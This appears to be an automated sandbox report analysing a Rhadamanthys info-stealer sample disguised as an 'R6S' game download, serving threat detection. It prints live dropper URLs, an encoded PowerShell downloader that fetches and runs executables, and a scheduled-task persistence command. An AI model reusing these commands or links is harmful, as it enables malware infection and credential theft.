rhadamanthys | hxxps://cdn[.]discordapp[.]com/attachments/1240115226024869969/1242263250343694376/R6S[.]zip?ex=6676ba8f&is=6675690f&hm=edac23ef54a6d0a5fd992653af5f9aed74be313ecac6524b38e92f00ed2fe42c&

Analysis

max time kernel
52s
max time network
54s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
21-06-2024 17:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://cdn.discordapp.com/attachments/1240115226024869969/1242263250343694376/R6S.zip?ex=6676ba8f&is=6675690f&hm=edac23ef54a6d0a5fd992653af5f9aed74be313ecac6524b38e92f00ed2fe42c&

Score

10^/10

rhadamanthys execution stealer

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://rentry.org/lem61111111111/raw

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://bitbucket.org/k34gk349g34g3/56j56j5j56j/raw/0f83a68fcbec53d90c5d0c17a582d7652b840e57/lemon.rar

Signatures

Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
stealer rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

a1fpnoau.mvs1.exe

description pid process target process

PID 4312 created 2940 4312 a1fpnoau.mvs1.exe sihost.exe
Blocklisted process makes network request 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

flow pid process

16 4880 powershell.exe
18 4880 powershell.exe
22 4668 powershell.exe
23 4984 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

4984 powershell.exe
4880 powershell.exe
4668 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 5 IoCs

Processes:

r6s.exea1fpnoau.mvs0.exea1fpnoau.mvs1.exea1fpnoau.mvs2.exea1fpnoau.mvs3.exe

pid process

380 r6s.exe
2300 a1fpnoau.mvs0.exe
4312 a1fpnoau.mvs1.exe
3812 a1fpnoau.mvs2.exe
980 a1fpnoau.mvs3.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

17 bitbucket.org
18 bitbucket.org
23 bitbucket.org
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	pid	process	target process
PID 4312 created 2940	4312	a1fpnoau.mvs1.exe	sihost.exe

flow	pid	process
16	4880	powershell.exe
18	4880	powershell.exe
22	4668	powershell.exe
23	4984	powershell.exe

pid	process
4984	powershell.exe
4880	powershell.exe
4668	powershell.exe

pid	process
380	r6s.exe
2300	a1fpnoau.mvs0.exe
4312	a1fpnoau.mvs1.exe
3812	a1fpnoau.mvs2.exe
980	a1fpnoau.mvs3.exe

flow	ioc
17	bitbucket.org
18	bitbucket.org
23	bitbucket.org

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

chrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133634638040695231"	chrome.exe

Modifies registry class 1 IoCs

Processes:

chrome.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings chrome.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exe

pid process

5100 schtasks.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000_Classes\Local Settings	chrome.exe

pid	process
5100	schtasks.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

Processes:

chrome.exepowershell.exepowershell.exepowershell.exea1fpnoau.mvs1.exeopenwith.exe

pid	process
3328	chrome.exe
3328	chrome.exe
4880	powershell.exe
4880	powershell.exe
4880	powershell.exe
4880	powershell.exe
4668	powershell.exe
4668	powershell.exe
4668	powershell.exe
4668	powershell.exe
4984	powershell.exe
4984	powershell.exe
4984	powershell.exe
4984	powershell.exe
4312	a1fpnoau.mvs1.exe
4312	a1fpnoau.mvs1.exe
3672	openwith.exe
3672	openwith.exe
3672	openwith.exe
3672	openwith.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs

Processes:

chrome.exe

pid process

3328 chrome.exe
3328 chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

chrome.exe7zG.exepowershell.exe

description	pid	process
Token: SeShutdownPrivilege	3328	chrome.exe
Token: SeCreatePagefilePrivilege	3328	chrome.exe
Token: SeShutdownPrivilege	3328	chrome.exe
Token: SeCreatePagefilePrivilege	3328	chrome.exe
Token: SeShutdownPrivilege	3328	chrome.exe
Token: SeCreatePagefilePrivilege	3328	chrome.exe
Token: SeShutdownPrivilege	3328	chrome.exe
Token: SeCreatePagefilePrivilege	3328	chrome.exe
Token: SeShutdownPrivilege	3328	chrome.exe
Token: SeCreatePagefilePrivilege	3328	chrome.exe
Token: SeShutdownPrivilege	3328	chrome.exe
Token: SeCreatePagefilePrivilege	3328	chrome.exe
Token: SeShutdownPrivilege	3328	chrome.exe
Token: SeCreatePagefilePrivilege	3328	chrome.exe
Token: SeShutdownPrivilege	3328	chrome.exe
Token: SeCreatePagefilePrivilege	3328	chrome.exe
Token: SeShutdownPrivilege	3328	chrome.exe
Token: SeCreatePagefilePrivilege	3328	chrome.exe
Token: SeShutdownPrivilege	3328	chrome.exe
Token: SeCreatePagefilePrivilege	3328	chrome.exe
Token: SeShutdownPrivilege	3328	chrome.exe
Token: SeCreatePagefilePrivilege	3328	chrome.exe
Token: SeShutdownPrivilege	3328	chrome.exe
Token: SeCreatePagefilePrivilege	3328	chrome.exe
Token: SeShutdownPrivilege	3328	chrome.exe
Token: SeCreatePagefilePrivilege	3328	chrome.exe
Token: SeShutdownPrivilege	3328	chrome.exe
Token: SeCreatePagefilePrivilege	3328	chrome.exe
Token: SeShutdownPrivilege	3328	chrome.exe
Token: SeCreatePagefilePrivilege	3328	chrome.exe
Token: SeShutdownPrivilege	3328	chrome.exe
Token: SeCreatePagefilePrivilege	3328	chrome.exe
Token: SeShutdownPrivilege	3328	chrome.exe
Token: SeCreatePagefilePrivilege	3328	chrome.exe
Token: SeShutdownPrivilege	3328	chrome.exe
Token: SeCreatePagefilePrivilege	3328	chrome.exe
Token: SeRestorePrivilege	3984	7zG.exe
Token: 35	3984	7zG.exe
Token: SeSecurityPrivilege	3984	7zG.exe
Token: SeSecurityPrivilege	3984	7zG.exe
Token: SeShutdownPrivilege	3328	chrome.exe
Token: SeCreatePagefilePrivilege	3328	chrome.exe
Token: SeShutdownPrivilege	3328	chrome.exe
Token: SeCreatePagefilePrivilege	3328	chrome.exe
Token: SeShutdownPrivilege	3328	chrome.exe
Token: SeCreatePagefilePrivilege	3328	chrome.exe
Token: SeShutdownPrivilege	3328	chrome.exe
Token: SeCreatePagefilePrivilege	3328	chrome.exe
Token: SeShutdownPrivilege	3328	chrome.exe
Token: SeCreatePagefilePrivilege	3328	chrome.exe
Token: SeShutdownPrivilege	3328	chrome.exe
Token: SeCreatePagefilePrivilege	3328	chrome.exe
Token: SeShutdownPrivilege	3328	chrome.exe
Token: SeCreatePagefilePrivilege	3328	chrome.exe
Token: SeShutdownPrivilege	3328	chrome.exe
Token: SeCreatePagefilePrivilege	3328	chrome.exe
Token: SeDebugPrivilege	4880	powershell.exe
Token: SeIncreaseQuotaPrivilege	4880	powershell.exe
Token: SeSecurityPrivilege	4880	powershell.exe
Token: SeTakeOwnershipPrivilege	4880	powershell.exe
Token: SeLoadDriverPrivilege	4880	powershell.exe
Token: SeSystemProfilePrivilege	4880	powershell.exe
Token: SeSystemtimePrivilege	4880	powershell.exe
Token: SeProfSingleProcessPrivilege	4880	powershell.exe

Suspicious use of FindShellTrayWindow 36 IoCs

Processes:

chrome.exe7zG.exe

pid	process
3328	chrome.exe
3328	chrome.exe
3328	chrome.exe
3328	chrome.exe
3328	chrome.exe
3328	chrome.exe
3328	chrome.exe
3328	chrome.exe
3328	chrome.exe
3328	chrome.exe
3328	chrome.exe
3328	chrome.exe
3328	chrome.exe
3328	chrome.exe
3328	chrome.exe
3328	chrome.exe
3328	chrome.exe
3328	chrome.exe
3328	chrome.exe
3328	chrome.exe
3328	chrome.exe
3328	chrome.exe
3328	chrome.exe
3328	chrome.exe
3328	chrome.exe
3328	chrome.exe
3328	chrome.exe
3328	chrome.exe
3328	chrome.exe
3328	chrome.exe
3328	chrome.exe
3328	chrome.exe
3328	chrome.exe
3328	chrome.exe
3328	chrome.exe
3984	7zG.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

chrome.exe

pid	process
3328	chrome.exe
3328	chrome.exe
3328	chrome.exe
3328	chrome.exe
3328	chrome.exe
3328	chrome.exe
3328	chrome.exe
3328	chrome.exe
3328	chrome.exe
3328	chrome.exe
3328	chrome.exe
3328	chrome.exe
3328	chrome.exe
3328	chrome.exe
3328	chrome.exe
3328	chrome.exe
3328	chrome.exe
3328	chrome.exe
3328	chrome.exe
3328	chrome.exe
3328	chrome.exe
3328	chrome.exe
3328	chrome.exe
3328	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 3328 wrote to memory of 428	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 428	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4612	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4612	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4612	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4612	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4612	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4612	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4612	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4612	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4612	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4612	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4612	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4612	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4612	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4612	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4612	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4612	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4612	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4612	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4612	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4612	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4612	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4612	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4612	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4612	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4612	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4612	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4612	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4612	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4612	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4612	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4612	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4612	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4612	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4612	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4612	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4612	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4612	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4612	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 1688	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 1688	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4444	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4444	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4444	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4444	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4444	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4444	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4444	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4444	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4444	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4444	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4444	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4444	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4444	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4444	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4444	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4444	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4444	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4444	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4444	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4444	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4444	3328	chrome.exe	chrome.exe
PID 3328 wrote to memory of 4444	3328	chrome.exe	chrome.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

c:\windows\system32\sihost.exe
sihost.exe
1⤵
PID:2940

C:\Windows\SysWOW64\openwith.exe
"C:\Windows\system32\openwith.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3672

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://cdn.discordapp.com/attachments/1240115226024869969/1242263250343694376/R6S.zip?ex=6676ba8f&is=6675690f&hm=edac23ef54a6d0a5fd992653af5f9aed74be313ecac6524b38e92f00ed2fe42c&
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3328

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xd0,0xd4,0xd8,0xcc,0xdc,0x7ffc82a39758,0x7ffc82a39768,0x7ffc82a39778
2⤵
PID:428

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1536 --field-trial-handle=1860,i,3089144399293954269,12690559974440267608,131072 /prefetch:2
2⤵
PID:4612

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1804 --field-trial-handle=1860,i,3089144399293954269,12690559974440267608,131072 /prefetch:8
2⤵
PID:1688

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2092 --field-trial-handle=1860,i,3089144399293954269,12690559974440267608,131072 /prefetch:8
2⤵
PID:4444

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2840 --field-trial-handle=1860,i,3089144399293954269,12690559974440267608,131072 /prefetch:1
2⤵
PID:2812

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2852 --field-trial-handle=1860,i,3089144399293954269,12690559974440267608,131072 /prefetch:1
2⤵
PID:2420

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5268 --field-trial-handle=1860,i,3089144399293954269,12690559974440267608,131072 /prefetch:8
2⤵
PID:3548

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5308 --field-trial-handle=1860,i,3089144399293954269,12690559974440267608,131072 /prefetch:8
2⤵
PID:2260

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3836 --field-trial-handle=1860,i,3089144399293954269,12690559974440267608,131072 /prefetch:8
2⤵
PID:3044

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5652 --field-trial-handle=1860,i,3089144399293954269,12690559974440267608,131072 /prefetch:8
2⤵
PID:4860

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5656 --field-trial-handle=1860,i,3089144399293954269,12690559974440267608,131072 /prefetch:8
2⤵
PID:2332

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:1940

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4420

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\R6S\" -spe -an -ai#7zMap10488:68:7zEvent17492
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3984

C:\Users\Admin\Downloads\R6S\r6s.exe
"C:\Users\Admin\Downloads\R6S\r6s.exe"
1⤵
- Executes dropped EXE
PID:380

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"
2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4880

C:\Users\Admin\AppData\Roaming\a1fpnoau.mvs0.exe
"C:\Users\Admin\AppData\Roaming\a1fpnoau.mvs0.exe"
3⤵
- Executes dropped EXE
PID:2300

C:\Windows\System32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\DD02.tmp\DD03.tmp\DD04.bat C:\Users\Admin\AppData\Roaming\a1fpnoau.mvs0.exe"
4⤵
PID:2044

C:\Windows\system32\chcp.com
chcp 1251
5⤵
PID:4208

C:\Windows\system32\findstr.exe
findstr /c:"127.0.0.1 store.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
5⤵
PID:3500

C:\Windows\system32\findstr.exe
findstr /c:"127.0.0.1 steamcommunity.com" "C:\Windows\System32\drivers\etc\hosts"
5⤵
PID:1236

C:\Windows\system32\findstr.exe
findstr /c:"127.0.0.1 help.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
5⤵
PID:3044

C:\Windows\system32\schtasks.exe
schtasks /query /tn "MyBatchScript"
5⤵
PID:2292

C:\Windows\system32\schtasks.exe
schtasks /create /tn "MyBatchScript" /tr "\"C:\Users\Admin\AppData\Roaming\runHidden.vbs\"" /sc onlogon /rl highest /f
5⤵
- Scheduled Task/Job: Scheduled Task
PID:5100

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
5⤵
PID:4860

C:\Windows\system32\reg.exe
reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
6⤵
PID:4988

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
5⤵
PID:4660

C:\Windows\system32\reg.exe
reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
6⤵
PID:1396

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/k34gk349g34g3/56j56j5j56j/raw/0f83a68fcbec53d90c5d0c17a582d7652b840e57/lemon.rar', 'C:\Users\Admin\AppData\Local\Temp\downloaded_archive.rar')"
5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4984

C:\Users\Admin\AppData\Roaming\a1fpnoau.mvs1.exe
"C:\Users\Admin\AppData\Roaming\a1fpnoau.mvs1.exe"
3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4312

C:\Users\Admin\AppData\Roaming\a1fpnoau.mvs2.exe
"C:\Users\Admin\AppData\Roaming\a1fpnoau.mvs2.exe"
3⤵
- Executes dropped EXE
PID:3812

C:\Users\Admin\AppData\Roaming\a1fpnoau.mvs3.exe
"C:\Users\Admin\AppData\Roaming\a1fpnoau.mvs3.exe"
3⤵
- Executes dropped EXE
PID:980

C:\Windows\System32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\DDBD.tmp\DDBE.tmp\DDBF.bat C:\Users\Admin\AppData\Roaming\a1fpnoau.mvs3.exe"
4⤵
PID:3852

C:\Windows\system32\where.exe
where node
5⤵
PID:356

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://nodejs.org/dist/v20.12.2/node-v20.12.2-x64.msi' -OutFile 'nodejs-installer.msi'"
5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4668

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
6KB

MD5
808c2814a867605ebfc1e9a39d9f0228

SHA1
98f3d2ac561625ffb78d075cd70e99a079a4104b

SHA256
d31df5686438ac44acdc0db3c4fed2e4fa87d131a0a34162d785f40eaf8a3fbb

SHA512
43de70fdd11a65ec0e768f25fdb51c21ec45d24d06b24d440b3ae28fa49bcc33aaa2b43772899d7bfb367394dbe7c27d955776291ea22e71320f5e215892cc78

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
Filesize
137KB

MD5
7adf064af330098167f8934131ac7eb4

SHA1
5e2fbf13ee9a6ad7a71a62b589cc7874ce43b1f8

SHA256
1fb912edb0ff7a3f9a5b0b50f1e71c406fd321558b2159fc94fbc6e8642e428c

SHA512
f44d73df476b662671436e306dc0a6766baf5207944018e6f7508affe113ee7e8f90f3af0d62c1b550695d7c6917e8ae0c8d9b348347b35f81cfe87351e5306a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
Filesize
138KB

MD5
a5f297a2a0a88f7366e8ba2f2637a02d

SHA1
04ea147168449719988473f3b4ea9a3e919a93e0

SHA256
ad5c73b95ae415a6185c6d77beac34c0917f0d6946204b4a34884f7bff914326

SHA512
719d0f219ddc90060988ff2b2c4744f278b9c50ae332eb8b14877332377fa638c69a64269ca15aae1a2a252f281e2eb20ea652fcb5dfbfbff690c9856c720c13

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json
Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
